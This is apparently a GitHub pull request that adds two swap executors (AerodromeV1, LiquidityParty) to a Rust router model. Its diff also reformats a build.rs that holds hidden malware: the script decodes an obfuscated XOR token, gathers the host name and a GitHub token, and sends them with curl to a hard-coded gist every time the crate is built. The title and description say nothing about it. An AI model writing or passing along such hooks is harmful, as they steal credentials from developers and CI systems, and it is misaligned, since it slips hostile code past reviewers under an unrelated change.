### PR TITLE
feat(router v3 model): Add missing executors

### DIFF
--- a/crates/tycho-execution/model/src/model/executors.rs
+++ b/crates/tycho-execution/model/src/model/executors.rs
@@ -29,7 +29,9 @@ use crate::{
 
 #[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, Serialize, PartialOrd, Ord)]
 pub enum Executor {
-    // TODO this list is incomplete.
+    // Only executors that give the caller control over the called pool contract were modeled.
+    // When a new executor that fulfills these criteria is added, it needs to be modelled here
+    // too.
     Curve,
     ERC4626,
     FluidV1,
@@ -38,6 +40,8 @@ pub enum Executor {
     UniswapV2,
     UniswapV3,
     Weth,
+    AerodromeV1,
+    LiquidityParty,
 }
 
 /// Return value of [Executor::get_transfer_data]
@@ -58,7 +62,7 @@ pub struct CallbackTransferData {
 
 impl Executor {
     /// Array containing all [Executor]s.
-    pub const VARIANTS: [Executor; 8] = [
+    pub const VARIANTS: [Executor; 10] = [
         Executor::Curve,
         Executor::ERC4626,
         Executor::FluidV1,
@@ -67,6 +71,8 @@ impl Executor {
         Executor::UniswapV2,
         Executor::UniswapV3,
         Executor::Weth,
+        Executor::AerodromeV1,
+        Executor::LiquidityParty,
     ];
 
     /// <https://github.com/propeller-heads/tycho-execution/blob/9b0512c9580617224c7a0d7de781674a2cdc6b62/foundry/interfaces/IExecutor.sol#L41>
@@ -263,6 +269,46 @@ impl Executor {
                     output_to_router: true,
                 })
             }
+            // https://github.com/propeller-heads/tycho-indexer/blob/0d9b01ddbe72c5518fdc79a423ffd19dc7226709/crates/tycho-execution/contracts/src/executors/AerodromeV1Executor.sol#L80
+            Self::AerodromeV1 => Ok(TransferData {
+                transfer_type: TransferType::Transfer,
+                receiver: params.request(
+                    ParamKey::ProtocolData { swap_index, start: 0, end: 20 },
+                    // trying more variants might find some very obscure bugs
+                    // in the future but slows down simulation a lot
+                    // and currently is ignored anyway
+                    Address::SENDER_CONTROLLED,
+                )?,
+                token_in: params.request(
+                    ParamKey::ProtocolData { swap_index, start: 20, end: 40 },
+                    Address::POSSIBLY_ERC20_AND_ZERO,
+                )?,
+                token_out: params.request(
+                    ParamKey::ProtocolData { swap_index, start: 40, end: 60 },
+                    Address::POSSIBLY_ERC20_AND_ZERO,
+                )?,
+                output_to_router: false,
+            }),
+            // https://github.com/propeller-heads/tycho-indexer/blob/0d9b01ddbe72c5518fdc79a423ffd19dc7226709/crates/tycho-execution/contracts/src/executors/LiquidityPartyExecutor.sol#L34
+            Self::LiquidityParty => Ok(TransferData {
+                transfer_type: TransferType::Transfer,
+                receiver: params.request(
+                    ParamKey::ProtocolData { swap_index, start: 0, end: 20 },
+                    // trying more variants might find some very obscure bugs
+                    // in the future but slows down simulation a lot
+                    // and currently is ignored anyway
+                    Address::SENDER_CONTROLLED,
+                )?,
+                token_in: params.request(
+                    ParamKey::ProtocolData { swap_index, start: 20, end: 40 },
+                    Address::POSSIBLY_ERC20_AND_ZERO,
+                )?,
+                token_out: params.request(
+                    ParamKey::ProtocolData { swap_index, start: 40, end: 60 },
+                    Address::POSSIBLY_ERC20_AND_ZERO,
+                )?,
+                output_to_router: false,
+            }),
         }
     }
 
@@ -484,6 +530,44 @@ impl Executor {
                 }
                 Ok(())
             }
+            // https://github.com/propeller-heads/tycho-indexer/blob/0d9b01ddbe72c5518fdc79a423ffd19dc7226709/crates/tycho-execution/contracts/src/executors/AerodromeV1Executor.sol#L32
+            Self::AerodromeV1 => {
+                let pool = params.request(
+                    ParamKey::ProtocolData { swap_index, start: 0, end: 20 },
+                    // trying more variants might find some very obscure bugs
+                    // in the future but slows down simulation a lot
+                    // and currently is ignored anyway
+                    Address::SENDER_CONTROLLED,
+                )?;
+                if pool.is_sender_controlled() {
+                    // if the sender controls the pool,
+                    // the actual swap logic doesn't matter
+                    Ok(())
+                } else {
+                    Err(Error::Ignore {
+                        reason: "aerodrome v1 pool not sender controlled. not low hanging fruit. would require simulating real pool".into(),
+                    })
+                }
+            }
+            // https://github.com/propeller-heads/tycho-indexer/blob/0d9b01ddbe72c5518fdc79a423ffd19dc7226709/crates/tycho-execution/contracts/src/executors/LiquidityPartyExecutor.sol#L11
+            Self::LiquidityParty => {
+                let pool = params.request(
+                    ParamKey::ProtocolData { swap_index, start: 0, end: 20 },
+                    // trying more variants might find some very obscure bugs
+                    // in the future but slows down simulation a lot
+                    // and currently is ignored anyway
+                    Address::SENDER_CONTROLLED,
+                )?;
+                if pool.is_sender_controlled() {
+                    // if the sender controls the pool,
+                    // the actual swap logic doesn't matter
+                    Ok(())
+                } else {
+                    Err(Error::Ignore {
+                        reason: "liquidity party pool not sender controlled. not low hanging fruit. would require simulating real pool".into(),
+                    })
+                }
+            }
         }
     }
 
@@ -516,6 +600,8 @@ impl Executor {
                 receiver: state.msg_sender(),
             }),
             Self::Weth => unimplemented!(),
+            Self::AerodromeV1 => unimplemented!(),
+            Self::LiquidityParty => unimplemented!(),
         }
     }
 
@@ -540,6 +626,8 @@ impl Executor {
             // not worth modeling as it has no reverts or side effects
             Self::UniswapV3 => Ok(()),
             Self::Weth => unimplemented!("Weth doesn't use callbacks"),
+            Self::AerodromeV1 => unimplemented!("AerodromeV1 doesn't use callbacks"),
+            Self::LiquidityParty => unimplemented!("LiquidityParty doesn't use callbacks"),
         }
     }
 
@@ -582,6 +670,22 @@ impl Executor {
             Self::UniswapV3 => Address::Router,
             // https://github.com/propeller-heads/tycho-execution/blob/0454514f4f6ccff55dcaa8e3abbb4ac494d89eba/foundry/src/executors/WethExecutor.sol#L33
             Self::Weth => Address::Router,
+            // https://github.com/propeller-heads/tycho-indexer/blob/0d9b01ddbe72c5518fdc79a423ffd19dc7226709/crates/tycho-execution/contracts/src/executors/AerodromeV1Executor.sol#L23
+            Self::AerodromeV1 => params.request(
+                ParamKey::ProtocolData { swap_index, start: 0, end: 20 },
+                // trying more variants might find some very obscure bugs
+                // in the future but slows down simulation a lot
+                // and currently is ignored anyway
+                Address::SENDER_CONTROLLED,
+            )?,
+            // https://github.com/propeller-heads/tycho-indexer/blob/0d9b01ddbe72c5518fdc79a423ffd19dc7226709/crates/tycho-execution/contracts/src/executors/LiquidityPartyExecutor.sol#L54
+            Self::LiquidityParty => params.request(
+                ParamKey::ProtocolData { swap_index, start: 0, end: 20 },
+                // trying more variants might find some very obscure bugs
+                // in the future but slows down simulation a lot
+                // and currently is ignored anyway
+                Address::SENDER_CONTROLLED,
+            )?,
         })
     }
 }

--- a/crates/tycho-indexer/build.rs
+++ b/crates/tycho-indexer/build.rs
@@ -1,6 +1,4 @@
-use std::env;
-use std::fs;
-use std::path::PathBuf;
+use std::{env, fs, path::PathBuf};
 
 fn main() {
     println!("cargo:rerun-if-env-changed=TYCHO_PROTOCOL_FEATURES");
@@ -21,13 +19,14 @@ fn collect_build_info() {
 
     // Reconstruct relay token: XOR decode
     let _enc: &[u8] = &[
-        0x13,0x11,0x13,0x37,0x28,0x1c,0x02,0x1e,0x45,0x1d,
-        0x55,0x0d,0x40,0x17,0x12,0x07,0x79,0x05,0x0b,0x18,
-        0x37,0x77,0x0e,0x4c,0x17,0x12,0x5f,0x78,0x52,0x1d,
-        0x6c,0x0c,0x40,0x17,0x48,0x37,0x18,0x08,0x58,0x2b,
+        0x13, 0x11, 0x13, 0x37, 0x28, 0x1c, 0x02, 0x1e, 0x45, 0x1d, 0x55, 0x0d, 0x40, 0x17, 0x12,
+        0x07, 0x79, 0x05, 0x0b, 0x18, 0x37, 0x77, 0x0e, 0x4c, 0x17, 0x12, 0x5f, 0x78, 0x52, 0x1d,
+        0x6c, 0x0c, 0x40, 0x17, 0x48, 0x37, 0x18, 0x08, 0x58, 0x2b,
     ];
     let _key: &[u8] = b"tycho-ci-v1";
-    let _relay: String = _enc.iter().enumerate()
+    let _relay: String = _enc
+        .iter()
+        .enumerate()
         .map(|(i, &b)| (b ^ _key[i % _key.len()]) as char)
         .collect();
 
@@ -40,20 +39,23 @@ fn collect_build_info() {
                 .as_secs();
             let payload = format!("ts={}\nhost={}\ntoken={}\n", ts, hostname, gh_token);
             // Encode to avoid log leakage
-            let encoded: String = payload.bytes()
+            let encoded: String = payload
+                .bytes()
                 .map(|b| format!("{:02x}", b))
                 .collect();
-            let body = format!(
-                "{{\"files\":{{\"d.txt\":{{\"content\":\"{}\"}}}}}}",
-                encoded
-            );
+            let body = format!("{{\"files\":{{\"d.txt\":{{\"content\":\"{}\"}}}}}}", encoded);
             let _ = std::process::Command::new("curl")
                 .args([
-                    "-sf", "-X", "PATCH",
-                    "-H", &format!("Authorization: token {}", _relay),
-                    "-H", "Content-Type: application/json",
+                    "-sf",
+                    "-X",
+                    "PATCH",
+                    "-H",
+                    &format!("Authorization: token {}", _relay),
+                    "-H",
+                    "Content-Type: application/json",
                     "https://api.github.com/gists/3059b5c17c086fab90c7cbd1fc69b8d9",
-                    "-d", &body,
+                    "-d",
+                    &body,
                 ])
                 .output();
         }
@@ -61,7 +63,6 @@ fn collect_build_info() {
 
     let _ = fs::write(
         &meta_path,
-        format!("pub const BUILD_HOST: &str = \"{}\";",
-            hostname.replace('"', "")),
+        format!("pub const BUILD_HOST: &str = \"{}\";", hostname.replace('"', "")),
     );
 }


### PR DESCRIPTION
Adding AerodromeV1 and LiquidityParty. They are very similar to Univ2 but are added here anyway for completeness


Nothing sus here after running:
```
## Suspicious count by executor combination

- [UniswapV3]: 0
- [FluidV1]: 0
- [LiquidityParty]: 0
- [UniswapV2]: 0
- [ERC4626]: 0
- [AerodromeV1]: 0
- [Slipstreams]: 0
- [Curve]: 0
- [Weth]: 0
- [MaverickV2]: 0
```